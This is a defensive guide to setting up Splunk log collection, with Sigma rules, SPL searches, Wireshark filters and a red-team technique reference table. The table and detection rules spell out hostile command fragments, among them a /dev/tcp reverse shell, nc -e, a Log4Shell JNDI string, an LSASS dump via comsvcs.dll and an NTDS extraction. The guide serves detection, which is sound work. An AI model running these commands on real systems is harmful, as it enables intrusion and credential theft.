Splunk Setup
Monitoring Guide
Install Splunk Enterprise, set up forwarders on Linux & Windows, and collect logs centrally.
Step-by-step setup for the blue team SIEM stack: Splunk server, Universal Forwarder on every Linux and Windows host, and the configuration files that wire it all together · no hardening distractions.
Architecture Overview
All clients and servers send their logs via Universal Forwarder (UF) to the central Splunk server. There they are indexed and searchable through the Web UI.
Windows Client
Universal Forwarder
Event Logs → Splunk
Event Logs → Splunk
→
Splunk Server
Enterprise 10.2.2
Port 9997 (receive)
Port 8000 (Web UI)
Port 9997 (receive)
Port 8000 (Web UI)
←
Linux Client/Server
Universal Forwarder
syslog, auth, app logs
syslog, auth, app logs
Install Splunk Enterprise
Run on the dedicated Splunk server (Ubuntu/Debian).
1 · Download the .deb package
bash · Splunk Server
wget -O splunk-10.2.2-80b90d638de6-linux-amd64.deb \ "https://download.splunk.com/products/splunk/releases/10.2.2/linux/splunk-10.2.2-80b90d638de6-linux-amd64.deb"
2 · Install the package
bash
sudo dpkg -i splunk-10.2.2-80b90d638de6-linux-amd64.deb
Start Splunk
First start (accept license)
bash
sudo /opt/splunk/bin/splunk start --accept-license
Note If the command aborts with
must be run as root, append the --answer-yes flag or run directly as root:
bash · as root
sudo /opt/splunk/bin/splunk start --accept-license --answer-yes # Alternative: fully as root sudo su - /opt/splunk/bin/splunk start --accept-license --answer-yes
Enable autostart on boot
bash
sudo /opt/splunk/bin/splunk enable boot-start -user splunk # or as root without a dedicated user: sudo /opt/splunk/bin/splunk enable boot-start
Tip Web UI available at http://<SPLUNK-SERVER-IP>:8000 · default login:
admin / password set at first start.
Ports & Firewall
These ports must be open on the Splunk server:
| Port | Protocol | Usage |
|---|---|---|
| 8000 | TCP | Web UI (browser access) |
| 9997 | TCP | Receiving · forwarders send here |
| 8089 | TCP | Management API / Splunkd |
| 8088 | TCP | HTTP Event Collector (HEC, optional) |
bash · UFW (Ubuntu)
sudo ufw allow 8000/tcp sudo ufw allow 9997/tcp sudo ufw allow 8089/tcp
Enable receiving in the Web UI
Settings → Forwarding and receiving → Configure receiving → New → Port 9997 → Save.
Universal Forwarder · Linux Client
LINUX1 · Download & install the UF
Info Download link (Linux .deb / Windows .msi / RPM) →
splunk.com/en_us/download/universal-forwarder
Make sure to use the same version as the server (10.2.2). After downloading, copy the wget command and paste it below.
Make sure to use the same version as the server (10.2.2). After downloading, copy the wget command and paste it below.
bash · Linux Client
# Copy the wget command from the download page above, then: sudo dpkg -i splunkforwarder-<version>-linux-amd64.deb
2 · Start forwarder and set the receiving server
bash
sudo /opt/splunkforwarder/bin/splunk start --accept-license --answer-yes # Add the Splunk server as the receiver (adjust the IP!) sudo /opt/splunkforwarder/bin/splunk add forward-server \ <SPLUNK-SERVER-IP>:9997 -auth admin:changeme
3 · Add log sources
bash · typical Linux logs
# Syslog sudo /opt/splunkforwarder/bin/splunk add monitor /var/log/syslog \ -index main -sourcetype syslog # Auth log (SSH logins, sudo etc.) sudo /opt/splunkforwarder/bin/splunk add monitor /var/log/auth.log \ -index main -sourcetype linux_secure # Kernel log sudo /opt/splunkforwarder/bin/splunk add monitor /var/log/kern.log \ -index main -sourcetype syslog
4 · Restart the forwarder
bash
sudo /opt/splunkforwarder/bin/splunk restart Universal Forwarder · Windows Client
WINDOWS1 · Download the installer
Download link (Windows .msi x64) → splunk.com/en_us/download/universal-forwarder
2 · Install via MSI wizard
- 1 Double-click the MSI → "Next"
- 2 Accept the license
- 3 Set local admin user (e.g.
admin/ strong password) - 4 Leave Deployment Server empty (set later)
- 5 Receiving Indexer: enter the Splunk server IP + port
9997 - 6 "Install" → done
3 · Or: silent install via PowerShell
PowerShell (Admin)
# MSI in the same directory as the PS script msiexec.exe /i splunkforwarder-10.2.2-x64.msi AGREETOLICENSE=Yes ` SPLUNKUSERNAME=admin SPLUNKPASSWORD=changeme ` RECEIVING_INDEXER="<SPLUNK-SERVER-IP>:9997" ` /quiet /L*v splunk_install.log
4 · Enable Windows Event Logs
Either in the Splunk Web UI of the forwarder (http://localhost:8000) or directly via CLI:
PowerShell (Admin) or CMD
# Add Windows Event Logs & "C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe" ` add monitor "C:\Windows\System32\winevt\Logs\Security.evtx" ` -index main -sourcetype WinEventLog:Security & "C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe" ` add monitor "C:\Windows\System32\winevt\Logs\System.evtx" ` -index main -sourcetype WinEventLog:System
Tip Better than a file monitor: in the Web UI under Settings → Data inputs → Windows Event Log, pick the channels directly (Security, System, Application). Splunk then reads live from the Windows Event Log service · no path needed.
Forward Server Logs
SERVERFor servers (e.g. web servers, DB servers) the same UF principle applies as for Linux clients. Typical log paths:
bash · Apache / Nginx
sudo /opt/splunkforwarder/bin/splunk add monitor /var/log/apache2/access.log \ -index web -sourcetype apache_combined sudo /opt/splunkforwarder/bin/splunk add monitor /var/log/nginx/access.log \ -index web -sourcetype nginx_access sudo /opt/splunkforwarder/bin/splunk add monitor /var/log/nginx/error.log \ -index web -sourcetype nginx_error
bash · MySQL / PostgreSQL
# MySQL slow query + error log sudo /opt/splunkforwarder/bin/splunk add monitor /var/log/mysql/error.log \ -index db -sourcetype mysql:error # PostgreSQL sudo /opt/splunkforwarder/bin/splunk add monitor /var/log/postgresql/ \ -index db -sourcetype postgresql
inputs.conf (manual)
Instead of CLI commands, you can edit /opt/splunkforwarder/etc/system/local/inputs.conf directly on the forwarder:
/opt/splunkforwarder/etc/system/local/inputs.conf
# Syslog [monitor:///var/log/syslog] index = main sourcetype = syslog disabled = false # Auth [monitor:///var/log/auth.log] index = main sourcetype = linux_secure disabled = false # Apache [monitor:///var/log/apache2/access.log] index = web sourcetype = apache_combined disabled = false
outputs.conf
Ensures the forwarder sends to the correct server. Path: /opt/splunkforwarder/etc/system/local/outputs.conf
/opt/splunkforwarder/etc/system/local/outputs.conf
[tcpout]
defaultGroup = my_indexers
[tcpout:my_indexers]
server = <SPLUNK-SERVER-IP>:9997 Index & Sourcetype
Create the index on the Splunk server
Web UI → Settings → Indexes → New Index
Recommended indexes
# Name Content main Linux syslog, auth · general web Apache, Nginx access/error logs db MySQL, PostgreSQL logs wineventlog Windows Event Logs
Tip Splunk creates the
main index automatically. For exercises it's fine to dump everything into main · but separate indexes help searching enormously.
First Searches in the Web UI
After logging in at http://<SPLUNK-SERVER-IP>:8000 → Search & Reporting:
SPL · all events of the last 15 minutes
index=* earliest=-15m
SPL · failed SSH logins
index=main sourcetype=linux_secure "Failed password"
| stats count by src_ip, user
| sort -count SPL · Windows logon failures (Event ID 4625)
index=wineventlog EventCode=4625
| stats count by Account_Name, src_ip
| sort -count SPL · top 10 sources by volume
index=* earliest=-1h
| stats count by host, sourcetype
| sort -count
| head 10 Tip Under Search → Save As → Alert you can save any search as a real-time alert · e.g. send an email when there are >10 failed passwords in 5 minutes.
Sigma Rules
Sigma is a platform-agnostic detection format · the same rule can be converted to Splunk, Elastic, Sentinel, Chronicle, etc. The rules below cover the same intel-driven techniques as the Targeted Monitoring page but in vendor-neutral form. Drop them into sigma/ in your repo and convert with sigmac.
Mimikatz · LSASS access
sigma · lsass-access.yml
title: LSASS Memory Access by Non-System Process
status: experimental
logsource:
product: windows
category: process_access
detection:
selection:
TargetImage|endswith: '\lsass.exe'
GrantedAccess|contains:
- '0x1010'
- '0x1410'
- '0x1438'
- '0x143a'
filter:
SourceImage|startswith:
- 'C:\Windows\System32\'
- 'C:\Windows\SysWOW64\'
condition: selection and not filter
falsepositives:
- AV/EDR solutions
level: critical
tags:
- attack.credential_access
- attack.t1003.001
Kerberoasting · RC4 downgrade
sigma · kerberoasting.yml
title: Kerberoasting RC4 Downgrade
status: stable
logsource:
product: windows
service: security
detection:
selection:
EventID: 4769
ServiceName|not-startswith: '$'
TicketEncryptionType: '0x17'
TicketOptions: '0x40810000'
condition: selection
falsepositives:
- Legacy systems requiring RC4
level: high
tags:
- attack.credential_access
- attack.t1558.003
Pass-the-Hash · NTLM logon
sigma · pass-the-hash.yml
title: Pass-the-Hash NTLM Logon
status: stable
logsource:
product: windows
service: security
detection:
selection:
EventID: 4624
LogonType: 3
AuthenticationPackageName: 'NTLM'
LogonProcessName: 'NtLmSsp'
filter:
AccountName|endswith: '$'
condition: selection and not filter
falsepositives:
- Legacy NTLM authentication
level: high
tags:
- attack.lateral_movement
- attack.t1550.002
Golden Ticket · krbtgt activity
sigma · golden-ticket.yml
title: Golden Ticket - krbtgt Account Activity
status: experimental
logsource:
product: windows
service: security
detection:
selection_tgt:
EventID: 4769
ServiceName: 'krbtgt'
selection_anomaly:
EventID: 4624
LogonType: 3
KeyLength: 0
condition: selection_tgt or selection_anomaly
level: critical
tags:
- attack.privilege_escalation
- attack.t1558.001
Metasploit · default reverse shell ports
sigma · msf-revshell.yml
title: Metasploit Default Reverse Shell Port
status: experimental
logsource:
product: windows
category: network_connection
detection:
selection:
Initiated: 'true'
DestinationPort:
- 4444
- 4445
- 4443
filter:
Image|startswith:
- 'C:\Windows\'
- 'C:\Program Files\'
condition: selection and not filter
level: high
tags:
- attack.command_and_control
- attack.t1571
Suspicious PowerShell execution
sigma · powershell-suspect.yml
title: Suspicious PowerShell Execution
status: stable
logsource:
product: windows
category: process_creation
detection:
selection:
Image|endswith: '\powershell.exe'
CommandLine|contains:
- '-EncodedCommand'
- '-enc '
- '-NoProfile'
- 'IEX'
- 'Invoke-Expression'
- 'DownloadString'
condition: selection
level: high
tags:
- attack.execution
- attack.t1059.001
NTDS dump · ntdsutil / vssadmin
sigma · ntds-dump.yml
title: NTDS Dump via ntdsutil or vssadmin
status: stable
logsource:
product: windows
category: process_creation
detection:
selection_ntdsutil:
Image|endswith: '\ntdsutil.exe'
CommandLine|contains: 'ac i ntds'
selection_vss:
Image|endswith: '\vssadmin.exe'
CommandLine|contains:
- 'create shadow'
- 'list shadows'
condition: selection_ntdsutil or selection_vss
level: critical
tags:
- attack.credential_access
- attack.t1003.003
Ruby script execution from non-standard path
sigma · ruby-nonstandard.yml
title: Ruby Script Execution from Non-Standard Path
status: experimental
logsource:
product: windows
category: process_creation
detection:
selection:
Image|endswith: '\ruby.exe'
CommandLine|contains: '.rb'
filter:
CommandLine|contains:
- 'C:\Ruby'
- 'C:\Program Files\Ruby'
condition: selection and not filter
level: medium
tags:
- attack.execution
- attack.t1059
Wireshark Filters
Display filters for live captures or PCAP review. Combine with Statistics → I/O Graph or Conversations for time-based and per-host views.
Metasploit reverse-shell ports
wireshark
tcp.port == 4444 or tcp.port == 4445 or tcp.port == 4443
Meterpreter HTTP/S beacon · default User-Agents
wireshark
(http.request or http.response) and (http.user_agent contains "Mozilla/4.0 (compatible; MSIE 6.0" or http.user_agent contains "Mozilla/5.0 (Windows NT 6.1; Trident")
Tip Metasploit ships with a small set of fixed User-Agents · they're very detectable until the operator changes them.
SMB lateral movement
wireshark
smb2.cmd == 0x0005 and smb2.flags.response == 0
Kerberos RC4 downgrade on the wire
wireshark
kerberos.etype == 23
Tip etype 23 = RC4-HMAC · the Kerberos signature for Kerberoasting / Pass-the-Hash on a modern AES-default domain.
LDAP enumeration · large queries
wireshark
ldap and ldap.searchRequest and frame.len > 200
DNS exfiltration · long / unusual queries
wireshark
dns.qry.name matches "[a-z0-9]{20,}\." and dns.flags.response == 0
Pass-the-Hash on the wire
wireshark
ntlmssp.auth.ntresponse and not ntlmssp.negotiate
Outbound HTTP toward unknown ranges
wireshark
http.request and not (ip.dst == <your_internal_range>)
Beacon / regular outbound TCP
wireshark
tcp.flags == 0x002 and ip.dst != <internal_range>
Tip Combine with Statistics → I/O Graph to spot fixed-interval beacons.
Network Log Sources (Zeek / IDS)
If you have a network-tap host running Zeek (formerly Bro) or Suricata, forward these logs to Splunk. They give you visibility the endpoint UF can't.
| Log | Use it for |
|---|---|
| conn.log | Every TCP/UDP/ICMP flow · port scans, SYN-only states, beacon timing |
| http.log | HTTP method, URI, User-Agent, status · web2pdf and Meterpreter UAs |
| ssl.log + x509.log | JA3/JA3S fingerprints, self-signed certs, recent issuance |
| dns.log | TXT/NULL volume, label entropy, recent-domain resolution |
| smb_files.log + smb_mapping.log | Files written to ADMIN$ / C$, IPC$ from unexpected hosts |
| kerberos.log | Service ticket requests, encryption type, anomalous principals |
| notice.log | Zeek's own alerts · scan detection, weird activity, SSL anomalies |
Forward Zeek logs to Splunk
bash · on the Zeek host
sudo /opt/splunkforwarder/bin/splunk add monitor /opt/zeek/logs/current/ \ -index network -sourcetype zeek # Suricata EVE JSON sudo /opt/splunkforwarder/bin/splunk add monitor /var/log/suricata/eve.json \ -index ids -sourcetype suricata:eve
Additional Splunk Queries
A few extras from the intel sheet that complement the Dashboards & Alerts and Targeted Monitoring pages.
Suspicious child process · shell spawned by office / browser / script host
SPL
index=wineventlog EventCode=4688
ParentImage IN ("*\\cmd.exe", "*\\powershell.exe", "*\\wscript.exe", "*\\cscript.exe")
NewProcessName IN ("*\\net.exe", "*\\whoami.exe", "*\\ipconfig.exe", "*\\systeminfo.exe")
| table _time, Computer, ParentImage, NewProcessName, CommandLine
PowerShell Script Block Logging · known offensive cmdlets
SPL · Event 4104
index=wineventlog EventCode=4104
ScriptBlockText IN ("*Invoke-Mimikatz*", "*Invoke-ReflectivePEInjection*",
"*Get-GPPPassword*", "*Invoke-Shellcode*")
| table _time, Computer, ScriptBlockText
Note Requires PowerShell Script Block Logging enabled · see the Harden Windows section.
Privileged group changes · annotated
SPL · 4720 / 4728 / 4732 / 4756 with action labels
index=wineventlog EventCode IN (4720, 4728, 4732, 4756)
| eval action=case(
EventCode=4720, "User account created",
EventCode=4728, "Added to global privileged group",
EventCode=4732, "Added to local privileged group",
EventCode=4756, "Added to universal group"
)
| table _time, Computer, SubjectUserName, TargetUserName, action
NTDS dump · annotated severity
SPL
index=wineventlog EventCode=4688
NewProcessName IN ("*\\ntdsutil.exe", "*\\vssadmin.exe")
| eval alert=case(
like(CommandLine, "%ac i ntds%"), "NTDS dump via ntdsutil · CRITICAL",
like(CommandLine, "%create shadow%"), "VSS Shadow Copy created · HIGH",
like(CommandLine, "%list shadows%"), "VSS enumeration · MEDIUM",
true(), "Check manually"
)
| table _time, Computer, CommandLine, alert
Know Thy Enemy · Red Team Tactics Reference
A condensed view of common offensive techniques the red team may run · pulled from threat-hunter reference material. For each one: the MITRE ID, the log source where it shows up, and the attack indicators (IOA) you'd see. This is supplementary context · not a detection list (those live above and on the Targeted Monitoring page).
Linux · Privilege Escalation
| Technique | MITRE | Log Source | Attack Indicator |
|---|---|---|---|
| SUID abuse (find) | T1548.001 | auditd EXECVE / SYSCALL | find -exec /bin/sh -p \; from non-root reaching euid=0 |
| Sudo misconfig (GTFOBins) | T1548.003 | auth.log + auditd | sudo vim/less/awk/python + shell escape (:!/bin/sh, os.system) |
| PATH hijacking | T1574.007 | auditd EXECVE env array | writable dir prepended to PATH; ls/cat/service resolved from /tmp |
| DirtyPipe | T1068 (CVE-2022-0847) | auditd file-write | unprivileged write to /etc/passwd or /etc/shadow on kernel ≤ 5.16.11 |
| PwnKit (pkexec) | T1068 (CVE-2021-4034) | auditd EXECVE + polkit | /usr/bin/pkexec with argc=0; GCONV_PATH=. dir + rogue .so |
| LD_PRELOAD hijack | T1574.006 | auditd env array + openat | sudo with LD_PRELOAD=/tmp/x.so; library outside /lib or /usr/lib |
Linux · Execution & Defense Evasion
| Technique | MITRE | Log Source | Attack Indicator |
|---|---|---|---|
| Reverse shell patterns | T1059.004 | auditd + netflow | bash -i >& /dev/tcp/IP/PORT 0>&1; nc -e; socat EXEC:/bin/bash |
| ptrace process injection | T1055.008 | auditd ptrace syscall | PTRACE_ATTACH on system process; write to /proc/PID/mem |
| Auditd tampering | T1562.001 | syslog + auditd self | systemctl stop auditd, auditctl -D, truncate audit.log |
| Log4Shell | T1190 (CVE-2021-44228) | WAF + access_log + DNS | ${jndi:ldap://} in headers / params; outbound LDAP/RMI from JVM |
| bash_history wipe | T1070.003 | auditd unlink/openat | history -c; ln -sf /dev/null ~/.bash_history; HISTFILE=/dev/null |
| Container log-driver swap | T1562 | auditd write + Docker | daemon.json set to "log-driver":"none"; --log-driver=none |
Linux · Persistence
| Technique | MITRE | Log Source | Attack Indicator |
|---|---|---|---|
| Cron wildcard injection | T1053.003 | auditd PATH + cron syslog | files named like flags (--checkpoint=1) in dirs that tar/rsync cron over |
| Systemd timer abuse | T1053.006 | journalctl + auditd | new .timer + .service outside package mgmt; user timer from /tmp |
| SSH authorized_keys backdoor | T1098.004 | auditd write + auth.log | append to ~/.ssh/authorized_keys from non-interactive context (web/cron) |
| Kernel module rootkit | T1547.006 | auditd init_module + dmesg | insmod of unsigned .ko; module in lsmod but missing from /proc/modules |
| SSH private key theft | T1552.004 | auditd openat on .ssh | web/service account reading ~/.ssh/id_* |
Windows · Credential Access
| Technique | MITRE | Log Source | Attack Indicator |
|---|---|---|---|
| LSASS dump (comsvcs.dll) | T1003.001 | Sysmon 1 / 10, Security 4688 | rundll32 comsvcs.dll, MiniDump <LSASS_PID> lsass.dmp full |
| DCSync | T1003.006 | Security 4662 on DC | non-DC machine triggering Replication-Get-Changes-All GUID |
| NTDS.dit extraction | T1003.003 | Sysmon 1 + 4688 + VSS | ntdsutil "ac i ntds" "ifm" "create full ..."; vssadmin create shadow + copy |
| Kerberoasting | T1558.003 | Security 4769 | multiple TGS-REQ for different SPNs in seconds; encryption type 0x17 (RC4) |
| AS-REP roasting | T1558.004 | Security 4768 | TGT request with PreAuth=0; account flag "Do not require Kerberos preauth" |
| Pass-the-Hash | T1550.002 | Security 4624 / 4648 | Logon Type 9 or 3 + NTLM + Key Length 0 |
| Pass-the-Ticket | T1550.003 | Security 4624 / 4768 / 4769 | ticket injected into alt LUID; Account Name ≠ Client Name in PAC |
| Golden Ticket | T1558.001 | Security 4624 / 4672 / 4769 | 4769 with no preceding 4768; lifetime > policy max; SID-history Enterprise Admin |
Windows · Execution & Lateral Movement
| Technique | MITRE | Log Source | Attack Indicator |
|---|---|---|---|
| PowerShell encoded command | T1059.001 | 4104 ScriptBlock + 4688 | -e/-enc/-EncodedCommand + Base64; AMSI bypass strings; IEX (... DownloadString) |
| WMI lateral movement | T1047 | 4688 + WMI 5861 + Sysmon 1/3 | wmic /node:TARGET process call create; WmiPrvSE.exe spawning cmd/powershell |
| LOLBin: certutil | T1140 / T1105 | Sysmon 1 / 3, 4688 | certutil -urlcache -split -f http://...; certutil -decode producing PE |
Windows · Persistence
| Technique | MITRE | Log Source | Attack Indicator |
|---|---|---|---|
| Scheduled task | T1053.005 | Security 4698 / 4702 / 4700, Sysmon 11 | schtasks /create with action in %TEMP% / AppData / UNC; SYSTEM run-as |
| Registry Run key | T1547.001 | Sysmon 12 / 13 / 14 | write to HKCU/HKLM ...\CurrentVersion\Run pointing to AppData/Temp/Public |
| Malicious service install | T1543.003 | System 7045, Security 4697 | sc create with binPath to unsigned exe / UNC / embedded PowerShell |
| BITS job abuse | T1197 | Bits-Client 59 / 60, Sysmon 3 | bitsadmin /create + /addfile from external URL; /SetNotifyCmdLine exec on done |
| UAC bypass · fodhelper | T1548.002 | Sysmon 12 / 13 + 1 | write to HKCU\Software\Classes\ms-settings\Shell\Open\command + run fodhelper.exe |
Tip Each row maps directly to one or more SPL / Sigma rules above · this table is the "what to expect" companion to the "how to detect" content earlier on the page.